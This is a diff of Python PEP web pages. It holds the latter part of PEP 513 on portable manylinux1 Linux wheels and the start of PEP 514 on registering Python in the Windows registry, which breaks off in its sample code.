The maintainers of the GNU C library follow a strict symbol versioning scheme +for backward compatibility. This ensures that binaries compiled against an older +version of glibc can run on systems that have a newer glibc. The +opposite is generally not true – binaries compiled on newer Linux +distributions tend to rely upon versioned functions in glibc that are not +available on older systems.

+

This generally prevents wheels compiled on the latest Linux distributions +from being portable.
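For illustration only (this helper is not part of the PEP’s tooling), the versioned glibc symbols that a compiled extension actually references can be inspected from its ELF dynamic symbol table. The sketch below shells out to binutils’ objdump; the module filename is a hypothetical example.

import re
import subprocess

def glibc_versions_required(path):
    # "objdump -T" prints the dynamic symbol table; undefined symbols
    # carry version annotations such as GLIBC_2.5 or GLIBC_2.14.
    out = subprocess.check_output(["objdump", "-T", path]).decode("utf-8", "replace")
    return sorted(set(re.findall(r"GLIBC_([0-9.]+)", out)))

# Hypothetical module name; any symbol version newer than 2.5 would make
# the containing wheel ineligible for the manylinux1 tag (see below).
print(glibc_versions_required("_example.cpython-35m-x86_64-linux-gnu.so"))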

+
+
+
+

The manylinux1 policy

+

For these reasons, to achieve broad portability, Python wheels

+
    +
  • should depend only on an extremely limited set of external shared +libraries; and
  • +
  • should depend only on “old” symbol versions in those external shared +libraries; and
  • +
  • should depend only on a widely-compatible kernel ABI.
  • +
+

To be eligible for the manylinux1 platform tag, a Python wheel must +therefore both (a) contain binary executables and compiled code that links +only to libraries with SONAMEs +included in the following list:

+
libpanelw.so.5
+libncursesw.so.5
+libgcc_s.so.1
+libstdc++.so.6
+libm.so.6
+libdl.so.2
+librt.so.1
+libc.so.6
+libnsl.so.1
+libutil.so.1
+libpthread.so.0
+libresolv.so.2
+libX11.so.6
+libXext.so.6
+libXrender.so.1
+libICE.so.6
+libSM.so.6
+libGL.so.1
+libgobject-2.0.so.0
+libgthread-2.0.so.0
+libglib-2.0.so.0
+
+
+

and, (b) work on a stock CentOS 5.11 [6] system that contains the system +package manager’s provided versions of these libraries.

+

libcrypt.so.1 was retrospectively removed from the whitelist after +Fedora 30 was released with libcrypt.so.2 instead.

+

Because CentOS 5 is only available for x86_64 and i686 architectures, +these are the only architectures currently supported by the manylinux1 +policy.

+

On Debian-based systems, these libraries are provided by the packages

+
libncurses5 libgcc1 libstdc++6 libc6 libx11-6 libxext6
+libxrender1 libice6 libsm6 libgl1-mesa-glx libglib2.0-0
+
+
+

On RPM-based systems, these libraries are provided by the packages

+
ncurses libgcc libstdc++ glibc libXext libXrender
+libICE libSM mesa-libGL glib2
+
+
+

This list was compiled by checking the external shared library dependencies of +the Canopy [4] and Anaconda [5] distributions, which both include a wide array +of the most popular Python modules and have been confirmed in practice to work +across a wide swath of Linux systems in the wild.

+

Many of the permitted system libraries listed above use symbol versioning +schemes for backward compatibility. The latest symbol versions provided with +the CentOS 5.11 versions of these libraries are:

+
GLIBC_2.5
+CXXABI_3.4.8
+GLIBCXX_3.4.9
+GCC_4.2.0
+
+
+

Therefore, as a consequence of requirement (b), any wheel that depends on +versioned symbols from the above shared libraries may depend only on symbols +with the following versions:

+
GLIBC <= 2.5
+CXXABI <= 3.4.8
+GLIBCXX <= 3.4.9
+GCC <= 4.2.0
+
+
+

These recommendations are the outcome of the relevant discussions in January +2016 [7], [8].

+

Note that in our recommendations below, we do not suggest that pip +or PyPI should attempt to check for and enforce the details of this +policy (just as they don’t check for and enforce the details of +existing platform tags like win32). The text above is provided (a) +as advice to package builders, and (b) as a method for allocating +blame if a given wheel doesn’t work on some system: if it satisfies +the policy above, then this is a bug in the spec or the installation +tool; if it does not satisfy the policy above, then it’s a bug in the +wheel. One useful consequence of this approach is that it leaves open +the possibility of further updates and tweaks as we gain more +experience, e.g., we could have a “manylinux 1.1” policy which targets +the same systems and uses the same manylinux1 platform tag (and +thus requires no further changes to pip or PyPI), but that adjusts +the list above to remove libraries that have turned out to be +problematic or add libraries that have turned out to be safe.

+
+

libpythonX.Y.so.1

+

Note that libpythonX.Y.so.1 is not on the list of libraries that +a manylinux1 extension is allowed to link to. Explicitly linking +to libpythonX.Y.so.1 is unnecessary in almost all cases: the way +ELF linking works, extension modules that are loaded into the +interpreter automatically get access to all of the interpreter’s +symbols, regardless of whether or not the extension itself is +explicitly linked against libpython. Furthermore, explicit linking to +libpython creates problems in the common configuration where Python is +not built with --enable-shared. In particular, on Debian and +Ubuntu systems, apt install pythonX.Y does not even install +libpythonX.Y.so.1, meaning that any wheel that did depend on +libpythonX.Y.so.1 could fail to import.

+

There is one situation where extensions that are linked in this way +can fail to work: if a host program (e.g., apache2) uses +dlopen() to load a module (e.g., mod_wsgi) that embeds the +CPython interpreter, and the host program does not pass the +RTLD_GLOBAL flag to dlopen(), then the embedded CPython will +be unable to load any extension modules that do not themselves link +explicitly to libpythonX.Y.so.1. Fortunately, apache2 does +set the RTLD_GLOBAL flag, as do all the other programs that +embed-CPython-via-a-dlopened-plugin that we could locate, so this does +not seem to be a serious problem in practice. The incompatibility with +Debian/Ubuntu is more of an issue than the theoretical incompatibility +with a rather obscure corner case.

+

This is a rather complex and subtle issue that extends beyond +the scope of manylinux1; for more discussion see: [9], [10], +[11].

+
+
+

UCS-2 vs UCS-4 builds

+

All versions of CPython 2.x, plus CPython 3.0-3.2 inclusive, can be +built in two ABI-incompatible modes: builds using the +--enable-unicode=ucs2 configure flag store Unicode data in UCS-2 +(or really UTF-16) format, while builds using the +--enable-unicode=ucs4 configure flag store Unicode data in +UCS-4. (CPython 3.3 and greater use a different storage method that +always supports UCS-4.) If we want to make sure ucs2 wheels don’t +get installed into ucs4 CPythons and vice-versa, then something +must be done.

+

An earlier version of this PEP included a requirement that +manylinux1 wheels targeting these older CPython versions should +always use the ucs4 ABI. But then, in between the PEP’s initial +acceptance and its implementation, pip and wheel gained +first-class support for tracking and checking this aspect of ABI +compatibility for the relevant CPython versions, which is a better +solution. So we now allow the manylinux1 platform tags to be used +in combination with any ABI tag. However, to maintain compatibility it +is crucial to ensure that all manylinux1 wheels include a +non-trivial abi tag. For example, a wheel built against a ucs4 +CPython might have a name like:

+
PKG-VERSION-cp27-cp27mu-manylinux1_x86_64.whl
+                 ^^^^^^ Good!
+
+
+

While a wheel built against the ucs2 ABI might have a name like:

+
PKG-VERSION-cp27-cp27m-manylinux1_x86_64.whl
+                 ^^^^^ Okay!
+
+
+

But you should never have a wheel with a name like:

+
PKG-VERSION-cp27-none-manylinux1_x86_64.whl
+                 ^^^^ BAD! Don't do this!
+
+
+

This wheel claims to be simultaneously compatible with both ucs2 and +ucs4 builds, which is bad.

+

We note for information that the ucs4 ABI appears to be much more +widespread among Linux CPython distributors.
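For reference, a tool can distinguish the two ABIs at runtime on the affected interpreter versions; the helper below is an illustrative sketch (not part of the PEP), relying on sys.maxunicode being 0xFFFF on ucs2 builds and 0x10FFFF on ucs4 builds.

import sys

def unicode_abi():
    # CPython 3.3+ uses flexible string storage; the ucs2/ucs4 ABI
    # distinction no longer exists there.
    if sys.version_info >= (3, 3):
        return None
    return "ucs4" if sys.maxunicode > 0xFFFF else "ucs2"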

+
+
+

fpectl builds vs. no fpectl builds

+

All extant versions of CPython can be built either with or without the +--with-fpectl flag to configure. It turns out that this +changes the CPython ABI: extensions that are built against a +no-fpectl CPython are always compatible with yes-fpectl +CPython, but the reverse is not necessarily true. (Symptom: errors at +import time complaining about undefined symbol: PyFPE_jbuf.) See: +[16].

+

For maximum compatibility, therefore, the CPython used to build +manylinux1 wheels must be compiled without the --with-fpectl +flag, and manylinux1 extensions must not reference the symbol +PyFPE_jbuf.
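As an illustration (not a normative check), one way to detect at runtime whether the current CPython was built --with-fpectl is to probe the process’s own dynamic symbol table for PyFPE_jbuf; this sketch assumes a Linux/glibc environment.

import ctypes

def built_with_fpectl():
    try:
        ctypes.CDLL(None).PyFPE_jbuf  # raises AttributeError if absent
        return True
    except AttributeError:
        return False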

+
+
+
+

Compilation of Compliant Wheels

+

The way glibc, libgcc, and libstdc++ manage their symbol versioning +means that in practice, the compiler toolchains that most developers +use to do their daily work are incapable of building +manylinux1-compliant wheels. Therefore, we do not attempt to change +the default behavior of pip wheel / bdist_wheel: they will +continue to generate regular linux_* platform tags, and developers +who wish to use them to generate manylinux1-tagged wheels will +have to change the tag as a second post-processing step.

+

To support the compilation of wheels meeting the manylinux1 standard, we +provide initial drafts of two tools.

+
+

Docker Image

+

The first tool is a Docker image based on CentOS 5.11, which is recommended as an easy-to-use, self-contained build box for compiling manylinux1 wheels [12]. Compiling on a more recently-released linux distribution will generally introduce dependencies on too-new versioned symbols. The image comes with a full compiler suite installed (gcc, g++, and gfortran 4.8.2) as well as the latest releases of Python and pip.
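A hypothetical invocation might look like the following; the image name and the /opt/python interpreter layout follow the manylinux project’s image conventions, and the paths should be adjusted for the package being built:

docker run --rm -v "$(pwd)":/io quay.io/pypa/manylinux1_x86_64 \
    /opt/python/cp35-cp35m/bin/pip wheel /io -w /io/wheelhouse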

+
+
+

Auditwheel

+

The second tool is a command line executable called auditwheel [13] that may aid package maintainers in dealing with third-party external dependencies.

+

There are at least three methods for building wheels that use third-party +external libraries in a way that meets the above policy.

+
    +
  1. The third-party libraries can be statically linked.
  2. +
  3. The third-party shared libraries can be distributed in +separate packages on PyPI which are depended upon by the wheel.
  4. +
  5. The third-party shared libraries can be bundled inside the wheel +libraries, linked with a relative path.
  6. +
+

All of these are valid options that may be used effectively by different packages and communities. Statically linking generally requires package-specific modifications to the build system, and distributing third-party dependencies on PyPI may require some coordination of the community of users of the package.

+

As an often-automatic alternative to these options, we introduce auditwheel. +The tool inspects all of the ELF files inside a wheel to check for +dependencies on versioned symbols or external shared libraries, and verifies +conformance with the manylinux1 policy. This includes the ability to add +the new platform tag to conforming wheels. More importantly, auditwheel has +the ability to automatically modify wheels that depend on external shared +libraries by copying those shared libraries from the system into the wheel +itself, and modifying the appropriate RPATH entries such that these +libraries will be picked up at runtime. This accomplishes a similar result as +if the libraries had been statically linked without requiring changes to the +build system. Packagers are advised that bundling, like static linking, may +implicate copyright concerns.
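As a usage sketch (the wheel filename here is hypothetical, and exact flags and output may differ between auditwheel releases): auditwheel show reports a wheel’s external dependencies and the platform tag it qualifies for, while auditwheel repair bundles needed shared libraries into the wheel and retags it:

auditwheel show dist/mypkg-1.0-cp35-cp35m-linux_x86_64.whl
auditwheel repair dist/mypkg-1.0-cp35-cp35m-linux_x86_64.whl -w dist/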

+
+
+
+

Bundled Wheels on Linux

+

While we acknowledge many approaches for dealing with third-party library +dependencies within manylinux1 wheels, we recognize that the manylinux1 +policy encourages bundling external dependencies, a practice +which runs counter to the package management policies of many linux +distributions’ system package managers [14], [15]. The primary purpose of +this is cross-distro compatibility. Furthermore, manylinux1 wheels on PyPI +occupy a different niche than the Python packages available through the +system package manager.

+

The decision in this PEP to encourage departure from general Linux distribution +unbundling policies is informed by the following concerns:

+
    +
  1. In these days of automated continuous integration and deployment +pipelines, publishing new versions and updating dependencies is easier +than it was when those policies were defined.
  2. +
  3. pip users remain free to use the "--no-binary" option if they want +to force local builds rather than using pre-built wheel files.
  4. +
  5. The popularity of modern container based deployment and “immutable +infrastructure” models involve substantial bundling at the application +layer anyway.
  6. +
  7. Distribution of bundled wheels through PyPI is currently the norm for +Windows and OS X.
  8. +
  9. This PEP doesn’t rule out the idea of offering more targeted binaries for +particular Linux distributions in the future.
  10. +
+

The model described in this PEP is best suited for cross-platform Python packages, because it means they can reuse much of the work that they’re already doing to make static Windows and OS X wheels. We recognize that it is less optimal for Linux-specific packages that might prefer to interact more closely with Linux’s unique package management functionality and only care about targeting a small set of particular distros.

+
+

Security Implications

+

One of the advantages of dependencies on centralized libraries in Linux is +that bugfixes and security updates can be deployed system-wide, and +applications which depend on these libraries will automatically feel the +effects of these patches when the underlying libraries are updated. This can +be particularly important for security updates in packages engaged in +communication across the network or cryptography.

+

manylinux1 wheels distributed through PyPI that bundle security-critical libraries like OpenSSL will thus assume responsibility for prompt updates in response to disclosed vulnerabilities and patches. This closely parallels the security implications of the distribution of binary wheels on Windows that, because the platform lacks a system package manager, generally bundle their dependencies. In particular, because it lacks a stable ABI, OpenSSL cannot be included in the manylinux1 profile.

+
+
+
+

Platform Detection for Installers

+

Above, we defined what it means for a wheel to be +manylinux1-compatible. Here we discuss what it means for a Python +installation to be manylinux1-compatible. In particular, this is +important for tools like pip to know when deciding whether or not +they should consider manylinux1-tagged wheels for installation.

+

Because the manylinux1 profile is already known to work for the many thousands of users of popular commercial Python distributions, we suggest that installation tools should err on the side of assuming that a system is compatible, unless there is specific reason to think otherwise.

+

We know of three main sources of potential incompatibility that are likely to arise in practice:

+
    +
  • Eventually, in the future, there may exist distributions that break +compatibility with this profile (e.g., if one of the libraries in +the profile changes its ABI in a backwards-incompatible way)
  • +
  • A linux distribution that is too old (e.g. RHEL 4)
  • +
  • A linux distribution that does not use glibc (e.g. Alpine Linux, which is +based on musl libc, or Android)
  • +
+

To address these we propose a two-pronged +approach. To handle potential future incompatibilities, we standardize +a mechanism for a Python distributor to signal that a particular +Python install definitely is or is not compatible with manylinux1: +this is done by installing a module named _manylinux, and setting +its manylinux1_compatible attribute. We do not propose adding any +such module to the standard library – this is merely a well-known +name by which distributors and installation tools can +rendezvous. However, if a distributor does add this module, they +should add it to the standard library rather than to a +site-packages/ directory, because the standard library is +inherited by virtualenvs (which we want), and site-packages/ in +general is not.
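For instance, a distributor shipping a Python known to be incompatible could install a module with the following (illustrative) contents:

# _manylinux.py, installed by the distributor into the standard library
manylinux1_compatible = False  # or True, for a known-compatible build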

+

Then, to handle the last two cases for existing Python +distributions, we suggest a simple and reliable method to check for +the presence and version of glibc (basically using it as a “clock” +for the overall age of the distribution).

+

Specifically, the algorithm we propose is:

+
def is_manylinux1_compatible():
+    # Only Linux, and only x86-64 / i686
+    from distutils.util import get_platform
+    if get_platform() not in ["linux-x86_64", "linux-i686"]:
+        return False
+
+    # Check for presence of _manylinux module
+    try:
+        import _manylinux
+        return bool(_manylinux.manylinux1_compatible)
+    except (ImportError, AttributeError):
+        # Fall through to heuristic check below
+        pass
+
+    # Check glibc version. CentOS 5 uses glibc 2.5.
+    return have_compatible_glibc(2, 5)
+
+def have_compatible_glibc(major, minimum_minor):
+    import ctypes
+
+    process_namespace = ctypes.CDLL(None)
+    try:
+        gnu_get_libc_version = process_namespace.gnu_get_libc_version
+    except AttributeError:
+        # Symbol doesn't exist -> therefore, we are not linked to
+        # glibc.
+        return False
+
+    # Call gnu_get_libc_version, which returns a string like "2.5".
+    gnu_get_libc_version.restype = ctypes.c_char_p
+    version_str = gnu_get_libc_version()
+    # py2 / py3 compatibility:
+    if not isinstance(version_str, str):
+        version_str = version_str.decode("ascii")
+
+    # Parse string and check against requested version.
+    version = [int(piece) for piece in version_str.split(".")]
+    assert len(version) == 2
+    if major != version[0]:
+        return False
+    if minimum_minor > version[1]:
+        return False
+    return True
+
+
+

Rejected alternatives: We also considered using a configuration +file, e.g. /etc/python/compatibility.cfg. The problem with this is +that a single filesystem might contain many different interpreter +environments, each with their own ABI profile – the manylinux1 +compatibility of a system-installed x86_64 CPython might not tell us +much about the manylinux1 compatibility of a user-installed i686 +PyPy. Locating this configuration information within the Python +environment itself ensures that it remains attached to the correct +binary, and dramatically simplifies lookup code.

+

We also considered using a more elaborate structure, like a list of +all platform tags that should be considered compatible, together with +their preference ordering, for example: _binary_compat.compatible = +["manylinux1_x86_64", "centos5_x86_64", "linux_x86_64"]. However, +this introduces several complications. For example, we want to be able +to distinguish between the state of “doesn’t support manylinux1” +(or eventually manylinux2, etc.) versus “doesn’t specify either +way whether it supports manylinux1”, which is not entirely obvious +in the above representation; and, it’s not at all clear what features +are really needed vis a vis preference ordering given that right now +the only possible platform tags are manylinux1 and linux. So +we’re deferring a more complete solution here for a separate PEP, when +/ if Linux gets more platform tags.

+

For the library compatibility check, we also considered much more +elaborate checks (e.g. checking the kernel version, searching for and +checking the versions of all the individual libraries listed in the +manylinux1 profile, etc.), but ultimately decided that this would +be more likely to introduce confusing bugs than actually help the +user. (For example: different distributions vary in where they +actually put these libraries, and if our checking code failed to use +the correct path search then it could easily return incorrect +answers.)

+
+
+

PyPI Support

+

PyPI should permit wheels containing the manylinux1 platform tag to be uploaded. PyPI should not attempt to formally verify that wheels containing the manylinux1 platform tag adhere to the manylinux1 policy described in this document. These verification tasks should be left to other tools, like auditwheel, that are developed separately.

+
+
+

Rejected Alternatives

+

One alternative would be to provide separate platform tags for each Linux +distribution (and each version thereof), e.g. RHEL6, ubuntu14_10, +debian_jessie, etc. Nothing in this proposal rules out the possibility of +adding such platform tags in the future, or of further extensions to wheel +metadata that would allow wheels to declare dependencies on external +system-installed packages. However, such extensions would require substantially +more work than this proposal, and still might not be appreciated by package +developers who would prefer not to have to maintain multiple build environments +and build multiple wheels in order to cover all the common Linux distributions. +Therefore, we consider such proposals to be out-of-scope for this PEP.

+
+
+

Future updates

+

We anticipate that at some point in the future there will be a +manylinux2 specifying a more modern baseline environment (perhaps +based on CentOS 6), and someday a manylinux3 and so forth, but we +defer specifying these until we have more experience with the initial +manylinux1 proposal.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0513.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0514/index.html b/pep-0514/index.html
new file mode 100644
index 00000000000..161ccb3f076
--- /dev/null
+++ b/pep-0514/index.html
@@ -0,0 +1,584 @@
PEP 514 – Python registration in the Windows registry | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 514 – Python registration in the Windows registry

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
02-Feb-2016
+
Post-History:
+
02-Feb-2016, 01-Mar-2016, 18-Jul-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP defines a schema for the Python registry key to allow third-party +installers to register their installation, and to allow tools and applications +to detect and correctly display all Python environments on a user’s machine. No +implementation changes to Python are proposed with this PEP.

+

Python environments are not required to be registered unless they want to be +automatically discoverable by external tools. As this relates to Windows only, +these tools are expected to be predominantly GUI applications. However, console +applications may also make use of the registered information. This PEP covers +the information that may be made available, but the actual presentation and use +of this information is left to the tool designers.

+

The schema matches the registry values that have been used by the official +installer since at least Python 2.5, and the resolution behaviour matches the +behaviour of the official Python releases. Some backwards compatibility rules +are provided to ensure tools can correctly detect versions of CPython that do +not register full information.

+
+
+

Motivation

+

When installed on Windows, the official Python installer creates a registry key +for discovery and detection by other applications. This allows tools such as +installers or IDEs to automatically detect and display a user’s Python +installations. For example, the PEP 397 py.exe launcher and editors such as +PyCharm and Visual Studio already make use of this information.

+

Third-party installers, such as those used by distributions, typically create +identical keys for the same purpose. Most tools that use the registry to detect +Python installations only inspect the keys used by the official installer. As a +result, third-party installations that wish to be discoverable will overwrite +these values, often causing users to “lose” their original Python installation.

+

By describing a layout for registry keys that allows third-party installations +to register themselves uniquely, as well as providing tool developers guidance +for discovering all available Python installations, these collisions should be +prevented. We also take the opportunity to add some well-known metadata so that +more information can be presented to users.

+
+
+

Definitions

+

A “registry key” is the equivalent of a file-system path into the registry. Each +key may contain “subkeys” (keys nested within keys) and “values” (named and +typed attributes attached to a key). These are used on Windows to store settings +in much the same way that directories containing configuration files would work.

+

HKEY_CURRENT_USER is the root of settings for the currently logged-in user, +and this user can generally read and write all settings under this root.

+

HKEY_LOCAL_MACHINE is the root of settings for all users. Generally, any +user can read these settings but only administrators can modify them. It is +typical for values under HKEY_CURRENT_USER to take precedence over those in +HKEY_LOCAL_MACHINE.

+

On 64-bit Windows, HKEY_LOCAL_MACHINE\Software\Wow6432Node is a special key +that 32-bit processes transparently read and write to rather than accessing the +Software key directly.

+

Further documentation regarding registry redirection on Windows is available +from the MSDN Library [1].

+
+
+

Structure

+

We consider there to be a single collection of Python environments on a machine, +where the collection may be different for each user of the machine. There are +three potential registry locations where the collection may be stored based on +the installation options of each environment:

+
HKEY_CURRENT_USER\Software\Python\<Company>\<Tag>
+HKEY_LOCAL_MACHINE\Software\Python\<Company>\<Tag>
+HKEY_LOCAL_MACHINE\Software\Wow6432Node\Python\<Company>\<Tag>
+
+
+

Official Python releases use PythonCore for Company, and the value of +sys.winver for Tag. The Company PyLauncher is reserved. Other registered +environments may use any values for Company and Tag. Recommendations are made +later in this document.

+

Company-Tag pairs are case-insensitive, and uniquely identify each environment. +Depending on the purpose and intended use of a tool, there are two suggested +approaches for resolving conflicts between Company-Tag pairs.

+

Tools that list every installed environment may choose to include those +even where the Company-Tag pairs match. They should ensure users can easily +identify whether the registration was per-user or per-machine, and which +registration has the higher priority.

+

Tools that aim to select a single installed environment from all registered environments based on the Company-Tag pair, such as the py.exe launcher, should always select the environment registered in HKEY_CURRENT_USER in preference to the matching one in HKEY_LOCAL_MACHINE.

+

Conflicts between HKEY_LOCAL_MACHINE\Software\Python and +HKEY_LOCAL_MACHINE\Software\Wow6432Node\Python should only occur when both +64-bit and 32-bit versions of an interpreter have the same Tag. In this case, +the tool should select whichever is more appropriate for its use.

+

If a tool is able to determine from the provided information (or lack thereof) +that it cannot use a registered environment, there is no obligation to present +it to users.

+

Except as discussed in the section on backwards compatibility, Company and Tag +values are considered opaque to tools, and no information about the interpreter +should be inferred from the text. However, some tools may display the Company +and Tag values to users, so ideally the Tag will be able to help users identify +the associated environment.

+

Python environments are not required to register themselves unless they want to +be automatically discoverable by external tools.

+
+

Backwards Compatibility

+

Python 3.4 and earlier did not distinguish between 32-bit and 64-bit builds in +sys.winver. As a result, it is not possible to have valid side-by-side +installations of both 32-bit and 64-bit interpreters under this scheme since it +would result in duplicate Tags.

+

To ensure backwards compatibility, applications should treat environments listed +under the following two registry keys as distinct, even when the Tag matches:

+
HKEY_LOCAL_MACHINE\Software\Python\PythonCore\<Tag>
+HKEY_LOCAL_MACHINE\Software\Wow6432Node\Python\PythonCore\<Tag>
+
+
+

Environments listed under HKEY_CURRENT_USER may be treated as distinct from +both of the above keys, potentially resulting in three environments discovered +using the same Tag. Alternatively, a tool may determine whether the per-user +environment is 64-bit or 32-bit and give it priority over the per-machine +environment, resulting in a maximum of two discovered environments.

+

It is not possible to detect side-by-side installations of both 64-bit and +32-bit versions of Python prior to 3.5 when they have been installed for the +current user. Python 3.5 and later always uses different Tags for 64-bit and +32-bit versions.
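A minimal sketch of how a tool might enumerate the 64-bit and 32-bit HKEY_LOCAL_MACHINE views separately, treating matching Tags as distinct environments per the rule above (the helper name is illustrative, not part of this PEP):

import winreg

def core_tags(view_flag):
    # view_flag selects the registry view: winreg.KEY_WOW64_64KEY reads
    # Software\Python\PythonCore, while winreg.KEY_WOW64_32KEY reads the
    # Software\Wow6432Node\Python\PythonCore view.
    tags = []
    try:
        with winreg.OpenKeyEx(winreg.HKEY_LOCAL_MACHINE,
                              r"Software\Python\PythonCore",
                              access=winreg.KEY_READ | view_flag) as key:
            i = 0
            while True:
                try:
                    tags.append(winreg.EnumKey(key, i))
                except OSError:
                    break
                i += 1
    except FileNotFoundError:
        pass
    return tags

tags_64bit = core_tags(winreg.KEY_WOW64_64KEY)
tags_32bit = core_tags(winreg.KEY_WOW64_32KEY)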

+

The following sections describe user-visible information that may be registered. For Python 3.5 and earlier, none of this information is available, but alternative defaults are specified for the PythonCore key.

+

Environments registered under other Company names have no backward compatibility +requirements and must use distinct Tags to support side-by-side installations. +Tools consuming these registrations are not required to disambiguate tags other +than by preferring the user’s setting.

+
+
+

Company

+

The Company part of the key is intended to group related environments and to +ensure that Tags are namespaced appropriately. The key name should be +alphanumeric without spaces and likely to be unique. For example, a trademarked +name (preferred), a hostname, or as a last resort, a UUID would be appropriate:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp
+HKEY_CURRENT_USER\Software\Python\www.example.com
+HKEY_CURRENT_USER\Software\Python\6C465E66-5A8C-4942-9E6A-D29159480C60
+
+
+

The company name PyLauncher is reserved for the PEP 397 launcher +(py.exe). It does not follow this convention and should be ignored by tools.

+

If a string value named DisplayName exists, it should be used to identify +the environment manufacturer/developer/distributor to users. Otherwise, the name +of the key should be used. (For PythonCore, the default display name is +“Python Software Foundation”.)

+

If a string value named SupportUrl exists, it may be displayed or otherwise +used to direct users to a web site related to the environment. (For +PythonCore, the default support URL is “http://www.python.org/”.)

+

A complete example may look like:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp
+    (Default) = (value not set)
+    DisplayName = "Example Corp"
+    SupportUrl = "http://www.example.com"
+
+
+
+
+

Tag

+

The Tag part of the key is intended to uniquely identify an environment within +those provided by a single company. The key name should be alphanumeric without +spaces and stable across installations. For example, the Python language +version, a UUID or a partial/complete hash would be appropriate, while a Tag +based on the install directory or some aspect of the current machine may not. +For example:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\examplepy
+HKEY_CURRENT_USER\Software\Python\ExampleCorp\3.6
+HKEY_CURRENT_USER\Software\Python\ExampleCorp\6C465E66
+
+
+

It is expected that some tools will require users to type the Tag into a command +line, and that the Company may be optional provided the Tag is unique across all +Python installations. Short, human-readable and easy to type Tags are +recommended, and if possible, select a value likely to be unique across all +other Companies.

+

If a string value named DisplayName exists, it should be used to identify the environment to users. Otherwise, the name of the key should be used. (For PythonCore, the default is “Python ” followed by the Tag.)

+

If a string value named SupportUrl exists, it may be displayed or otherwise +used to direct users to a web site related to the environment. (For +PythonCore, the default is “http://www.python.org/”.)

+

If a string value named Version exists, it should be used to identify the +version of the environment. This is independent from the version of Python +implemented by the environment. (For PythonCore, the default is the first +three characters of the Tag.)

+

If a string value named SysVersion exists, it must be in x.y or +x.y.z format matching the version returned by sys.version_info in the +interpreter. If omitted, the Python version is unknown. (For PythonCore, +the default is the first three characters of the Tag.)

+

If a string value named SysArchitecture exists, it must match the first +element of the tuple returned by platform.architecture(). Typically, this +will be “32bit” or “64bit”. If omitted, the architecture is unknown. (For +PythonCore, the architecture is “32bit” when registered under +HKEY_LOCAL_MACHINE\Software\Wow6432Node\Python or anywhere on a 32-bit +operating system, “64bit” when registered under +HKEY_LOCAL_MACHINE\Software\Python on a 64-bit machine, and unknown when +registered under HKEY_CURRENT_USER.)

+

Note that each of these values is recommended, but optional. Omitting +SysVersion or SysArchitecture may prevent some tools from correctly +supporting the environment. A complete example may look like this:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\examplepy
+    (Default) = (value not set)
+    DisplayName = "Example Py Distro 3"
+    SupportUrl = "http://www.example.com/distro-3"
+    Version = "3.0.12345.0"
+    SysVersion = "3.6.0"
+    SysArchitecture = "64bit"
+
+
+
+
+

InstallPath

+

Beneath the environment key, an InstallPath key must be created. This key is +always named InstallPath, and the default value must match sys.prefix:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\3.6\InstallPath
+    (Default) = "C:\ExampleCorpPy36"
+
+
+

If a string value named ExecutablePath exists, it must be the full path to +the python.exe (or equivalent) executable. If omitted, the environment is +not executable. (For PythonCore, the default is the python.exe file in +the directory referenced by the (Default) value.)

+

If a string value named ExecutableArguments exists, tools should use the +value as the first arguments when executing ExecutablePath. Tools may add +other arguments following these, and will reasonably expect standard Python +command line options to be available.

+

If a string value named WindowedExecutablePath exists, it must be a path to +the pythonw.exe (or equivalent) executable. If omitted, the default is the +value of ExecutablePath, and if that is omitted the environment is not +executable. (For PythonCore, the default is the pythonw.exe file in the +directory referenced by the (Default) value.)

+

If a string value named WindowedExecutableArguments exists, tools should use +the value as the first arguments when executing WindowedExecutablePath. +Tools may add other arguments following these, and will reasonably expect +standard Python command line options to be available.

+

A complete example may look like:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\examplepy\InstallPath
+    (Default) = "C:\ExampleDistro30"
+    ExecutablePath = "C:\ExampleDistro30\ex_python.exe"
+    ExecutableArguments = "--arg1"
+    WindowedExecutablePath = "C:\ExampleDistro30\ex_pythonw.exe"
+    WindowedExecutableArguments = "--arg1"
+
+
+
+
+

Help

+

Beneath the environment key, a Help key may be created. This key is always +named Help if present and has no default value.

+

Each subkey of Help specifies a documentation file, tool, or URL associated +with the environment. The subkey may have any name, and the default value is a +string appropriate for passing to os.startfile or equivalent.

+

If a string value named DisplayName exists, it should be used to identify +the help file to users. Otherwise, the key name should be used.

+

A complete example may look like:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\6C465E66\Help
+    Python\
+        (Default) = "C:\ExampleDistro30\python36.chm"
+        DisplayName = "Python Documentation"
+    Extras\
+        (Default) = "http://www.example.com/tutorial"
+        DisplayName = "Example Distro Online Tutorial"
+
+
+
+
+

Other Keys

+

All other subkeys under a Company-Tag pair are available for private use.

+

Official CPython releases have traditionally used certain keys in this space to +determine the location of the Python standard library and other installed +modules. This behaviour is retained primarily for backward compatibility. +However, as the code that reads these values is embedded into the interpreter, +third-party distributions may be affected by values written into PythonCore +if using an unmodified interpreter.

+
+
+
+

Sample Code

+

This sample code enumerates the registry and displays the available Company-Tag +pairs that could be used to launch an environment and the target executable. It +only shows the most-preferred target for the tag. Backwards-compatible handling +of PythonCore is omitted but shown in a later example:

+
# Display most-preferred environments.
+# Assumes a 64-bit operating system
+# Does not correctly handle PythonCore compatibility
+
+import winreg
+
+def enum_keys(key):
+    i = 0
+    while True:
+        try:
+            yield winreg.EnumKey(key, i)
+        except OSError:
+            break
+        i += 1
+
+def get_value(key, value_name):
+    try:
+        # Named values require QueryValueEx; QueryValue would instead read
+        # the default value of a *subkey* with this name. Passing None as
+        # value_name reads the key's own default value.
+        return winreg.QueryValueEx(key, value_name)[0]
+    except FileNotFoundError:
+        return None
+
+seen = set()
+for hive, key, flags in [
+    (winreg.HKEY_CURRENT_USER, r'Software\Python', 0),
+    (winreg.HKEY_LOCAL_MACHINE, r'Software\Python', winreg.KEY_WOW64_64KEY),
